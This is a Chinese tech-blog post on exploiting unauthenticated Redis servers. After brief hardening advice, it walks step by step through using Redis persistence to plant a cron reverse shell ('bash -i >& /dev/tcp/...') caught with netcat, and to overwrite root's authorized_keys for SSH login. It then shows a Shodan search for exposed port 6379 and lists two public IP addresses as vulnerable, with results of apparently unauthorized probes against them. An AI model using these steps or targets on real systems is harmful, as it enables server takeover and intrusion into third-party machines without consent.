Redis:未授权访问

于 2024-07-26 08:09:14 发布
阅读量1k 收藏 14
点赞数 27
文章标签: redis 数据库 缓存
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/h1008685/article/details/140685003
版权

Redis

Redis(Remote Dictionary Server)是一个开源的高性能键值对(key-value)数据库,支持多种类型的数据结构。

核心特性

内存存储:Redis将所有数据存储在内存中,能够提供极高的读写性能。

持久化:虽然Redis是内存数据库,但提供了两种持久化机制:

RDB(Redis Database):在指定的时间间隔内将内存中的数据快照保存到磁盘。

AOF(Append Only File):记录每次写操作命令,并在服务器启动时重新执行这些命令来恢复数据。

漏洞成因

开发者配置不当,数据库对用户连接无限制,随意进行数据读写,并利用持久化机制,将文件保存至服务器,任意文件路径下

危险的配置文件项

配置项问题描述安全建议
监听配置 (bind)默认可能绑定到 0.0.0.0,允许所有IP访问绑定到内网地址或特定安全的网络接口
端口配置 (port)通常开放标准端口,容易被发现更改为非标准端口,减少被扫描的机率
密码设置 (requirepass)默认无密码设置设置强密码,避免未授权访问
防火墙不启用,或配置过于宽松启用并严格配置 ,限制用户和命令的权限
保护模式 (protected-mode)若设置为 no,在无密码的情况下任何IP都可以连接保持默认的 yes,或在禁用时确保使用强密码和 ACL

漏洞危害

1.服务器目录结构泄露

2.任意文件上传

3.服务器接管

redis常用操作

别名配置【详细点击主页查找】

alias redis='/usr/local/redis-6.0.9/src/redis-server /usr/local/redis-6.0.9/redis.conf'
alias rcli='/usr/local/redis-6.0.9/src/redis-cli'

 1.远程连接redis服务器

rcli -h 服务器ip地址 -p 运行redis服务的端口默认6379

rcli -h 39.108.91.74 -p 6379

2.读写数据

写:set 键名 数据

读:get 键名

 3.获取服务器信息

39.108.91.74:6379>info

4.获取配置文件信息[两行为整体,一行键一行值]

 106.15.138.150:6379> config get *

5.获取当前所有键

106.15.138.150:6379> keys *

6.动态修改文件保存路径及文件名

修改保存文件名:config set dbfilename 文件名

修改保存路径:config set dir 文件保存路径

7.将数据保存文件

106.15.138.150:6379> save

8.利用报错,判断文件保存是否成功

存在文件但不是目录类型: (error) ERR Changing directory: Not a directory

没有这样的文件或目录: (error) ERR Changing directory: No such file or directory

 

9.删除所有数据

flushall

redis漏洞利用

环境检验

攻击机:192.168.10.5

靶机:192.168.10.6

1.攻击机靶机正常通信

2.靶机开启redis服务

3.靶机检查redis端口状态

netstat -an 列出所有网络连接和监听的端口。

通过管道 | 传递给 grep 6379 命令。

grep 6379 搜索包含 "6379" 的行,并将结果输出到终端。

4.攻击机和靶机关闭防火墙

5.攻击机连接靶机redis服务

 

写入反弹连接

1.将cron表达式存储与随机键下

set x "\n* * * * * bash -i >& /dev/tcp/192.168.10.5/7777 0>&1\n"

每分钟对192.168.10.5的7777端口建立tcp连接,加入\n换行符防止其余保存数据对任务造成影响

2.配置保存路径,修改为定时任务目录下

config set dir /var/spool/cron/

cron目录:目录下存放以用户名命名的定时任务

3.修改保存文件名,改为root,使root用户每分钟执行一次表达式

config set dbfilename root

靶机已存在该文件。redis权限为root可以进行覆盖

 4.保存

save

5.查看靶机root用户的计划任务是否添加成功[]

 config set dir /var/spool/cron/root

(error) ERR Changing directory: Not a directory
当前目录下有root文件

6.使用nc监听靶机7777端口,进行反向连接

 nc -lvp 7777

连接成功: 

 

<1.查看靶机计划任务

 

写入ssh密钥实现免密登录

使用场景:目标主机存在开启了ssh服务的端口,且存在.ssh文件夹

原理:通过redis写入公钥文件,将源文件进行覆盖

密钥相关知识文章见主页其他文章

测试密钥登录
<1.复制公钥上传至靶机

靶机下出现文件 /root/.ssh/authorized_keys

<2 使用私钥进行登录

 <3 删除密钥文件authorized_keys 留存.ssh

 

 redis写入密钥
1.将公钥内容拼接换行符写入redis

 2.动态修改保存路径和文件名并将文件保存

 3.使用私钥进行登录

 

 如何寻找redis未授权访问漏洞

进入shodan

https://www.shodan.io

搜索关键字

port:6379

 

存在漏洞的ip

39.108.91.74:6379
读写:正常
动态修改:异常
文件路径:异常


106.15.138.150:6379
读写:正常
动态修改:正常
文件路径:正常
连接:异常

Zeddm
关注
  • 27
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在...
漏洞复现之Redis授权访问
m0_56190544的博客
09-13 2457
本文详细介绍了redis授权访问漏洞的原理以及利用方法,供大家参考学习
授权访问漏洞-Redis授权访问漏洞
HAKUNAMATATATTA的博客
11-29 3790
授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面配置不当导 致其他用户可以无需认证授权直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。Redis 是完全开源免费的,一个灵活的高性能 key-value 数据结构存储,可以用来作为数据库缓存和消息队列。
02-Redis授权访问漏洞
最新发布
qq_57410330的博客
07-16 959
详谈redis授权访问漏洞,原理、利用及加固方式
redis_授权访问
scu_hacker博客
01-13 8082
本文介绍redis授权访问的4种利用方式
redis授权访问漏洞(三种方法)
网安小白的博客
08-30 5587
redis授权访问复现,含写入webshell、linux计划任务反弹shell、写入ssh公钥实现ssh登录三种方法~
Redis授权访问
weixin_63960760的博客
08-29 1075
redis默认情况下,会绑定在0.0.0.0:6379,如果没有采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等,这样将会将Redis服务暴露在公网上,如果在没有设置密码认证的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问Redis以及读取Redis的数据。
redis授权访问
weixin_65219040的博客
06-18 9341
redis
Redis授权访问配合SSH key文件利用详解
09-09
本文将详细讨论一个常见的安全问题:Redis授权访问配合SSH key文件利用。 Redis默认监听在`0.0.0.0:6379`,这意味着它对所有网络接口开放,如果不加以限制,任何能够访问到服务器的人都可以尝试连接Redis。特别是...
redis授权访问检测脚本.py
02-11
python编写的redis授权访问漏洞检测脚本
redis授权访问漏洞
热门推荐
jiji_king的博客
07-07 1万+
个人笔记
Redis授权访问漏洞详解(全面)
m0_64481831的博客
02-26 3428
Redis是一款内存高速缓存数据库,是一款K-V型数据库,它的所有键值都是用字典来存储的。其中它的value支持多种数据类型,包括String、List、Set、Zset和Hash。Redis默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问,就会将Redis服务暴露在公网上;并且Redis默认情况是空密码连接在服务器以root身份运行Redis时这将导致任意用户可以访问目标服务器下授权访问Redis以及读取Redis数据。
Redis 授权访问
qq_61553520的博客
05-17 547
Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问等,Redis服务将会暴露到公网上,以及在没有设置密码认证的情况下,会导致任意用户在可以访问目标服务器的情况下进行授权访问Redis
redis授权getshell四种方式
没有
04-24 4520
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。在两个Redis实例设置主从模式的时候,Redis的主机实例可以通过FULLRESYNC同步文件到从机上,然后在从机上加载so文件,我们就可以执行拓展的新命令了。
Redis授权访问漏洞
05-31
Redis是一款流行的内存数据库,但是在使用时需要注意到安全问题,其中一个比较常见的问题就是Redis授权访问漏洞。该漏洞会导致攻击者可以直接访问Redis服务器,获取其中的数据、修改数据或者直接删除数据,给应用程序和数据造成极大的安全风险。 攻击者通常会利用一些特定的工具或者脚本进行扫描,寻找处于授权状态的Redis服务。这些工具会自动化地进行扫描并利用默认口令或弱口令进行暴力破解,从而获取服务器权限。 为了避免Redis授权访问漏洞的发生,建议管理员在使用Redis时,采取以下措施: 1. 禁止公网访问:将Redis服务器部署在内网中,并禁止对公网开放访问。 2. 修改默认口令:使用较为复杂的口令,并定期更换口令。 3. 启用身份验证:启用Redis的身份验证功能,只允许已授权的用户访问。 4. 定期更新补丁:及时更新Redis的安全补丁,以修复已知漏洞。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值